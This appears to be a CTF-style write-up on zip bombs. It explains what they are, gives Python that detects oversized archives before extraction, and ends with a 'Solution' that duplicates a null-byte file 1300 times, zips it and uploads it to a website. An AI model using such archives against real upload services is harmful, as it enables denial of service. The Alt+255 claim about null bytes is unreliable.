Zip Bomb

  • A zip bomb, also known as a zip of death or decompression bomb, is a malicious archive file designed to crash or render useless the program or system reading it

  • It is often employed to disable antivirus software, in order to create an opening for more traditional viruses

  • Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory

  • Most modern antivirus programs can detect whether a file is a zip bomb, to avoid unpacking it
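
The detection mentioned in the last bullet can be sketched as a pre-extraction check. This is an added example, not code from the original write-up: it inspects an uploaded zip's metadata and then counts real decompressed bytes against a budget. The limits, the function names and the `build_sample` helper are assumptions made for illustration.

```python
import io
import zipfile

# Assumed limits for illustration; tune to the service being protected.
MAX_TOTAL_BYTES = 20 * 1024 * 1024  # decompressed budget (the 20MB figure from this page)
MAX_MEMBERS = 1000                  # hypothetical cap on entries per archive
MAX_RATIO = 100                     # hypothetical cap on uncompressed/compressed ratio

def check_declared(zf):
    """Cheap pre-check on central-directory metadata, before any decompression."""
    infos = zf.infolist()
    if len(infos) > MAX_MEMBERS:
        return "too many members"
    total = sum(i.file_size for i in infos)
    packed = sum(i.compress_size for i in infos) or 1
    if total > MAX_TOTAL_BYTES:
        return "declared size over budget"
    if total / packed > MAX_RATIO:
        return "compression ratio too high"
    return None

def check_streamed(zf):
    """Decompress in 64 KiB chunks and count real output, stopping at the budget."""
    produced = 0
    for info in zf.infolist():
        with zf.open(info) as member:
            while chunk := member.read(64 * 1024):
                produced += len(chunk)
                if produced > MAX_TOTAL_BYTES:
                    return "actual output over budget"
    return None

def inspect_archive(data):
    """Return "ok" or the reason the upload should be rejected without extracting it."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return check_declared(zf) or check_streamed(zf) or "ok"
    except zipfile.BadZipFile:
        return "not a valid zip"

def build_sample(members, payload):
    """Constructed test input: an in-memory zip with `members` copies of `payload`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for i in range(members):
            zf.writestr("{}.txt".format(i), payload)
    return buf.getvalue()
```

Archives nested inside members are not recursed into here; a scanner that unpacks nested archives needs to share one budget across all levels.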

Solution:

  • Create a large text file with a bunch of characters in it

    • I used null bytes (alt + 255)

  • Save the file in a folder

  • Write a Python script to mass-duplicate this file so that the total size of the folder is larger than 20MB

import shutil

# Copy the seed file a.txt to 0.txt ... 1299.txt in the same folder
for i in range(1300):
    shutil.copy2('/root/Desktop/test/a.txt', '/root/Desktop/test/{}.txt'.format(i))

  • Create a zip file from this folder

zip -r test.zip test

  • Upload this zip file to the website
